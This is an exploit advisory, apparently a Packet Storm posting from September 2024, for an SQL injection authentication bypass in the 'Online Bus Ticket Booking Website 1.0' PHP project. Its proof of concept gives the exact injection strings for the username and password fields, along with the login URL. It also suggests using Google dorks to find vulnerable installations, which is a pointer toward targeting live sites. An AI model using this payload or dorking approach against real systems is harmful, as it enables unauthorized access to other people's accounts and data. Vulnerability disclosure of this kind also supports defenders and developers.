Online Bus Ticket Booking Website 1.0 SQL Injection

Online Bus Ticket Booking Website 1.0 SQL Injection
Posted Sep 18, 2024
Authored by indoushka

Online Bus Ticket Booking Website version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

tags | exploit, remote, sql injection, bypass
SHA-256 | 07cf01fe4d4e0156b5b9d3867b0d730760e244d75733bd6a21e9831bb21eb671
=============================================================================================================================================
| # Title : online bus ticket booking Website v1.0 Auth By PAss Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits) |
| # Vendor : https://www.kashipara.com/project/download/project2/user/2024/202406/kashipara.com_online-bus-ticket-booking-.zip |
=============================================================================================================================================

POC :

[+] Dorking İn Google Or Other Search Enggine.

[+] User : 'or''='@gmail.com & PAss = 'or''='

[+] http://127.0.0.1/online-bus-ticket-booking-Website/login.php

Greetings to :============================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |
==========================================================================

نوشته های مشابه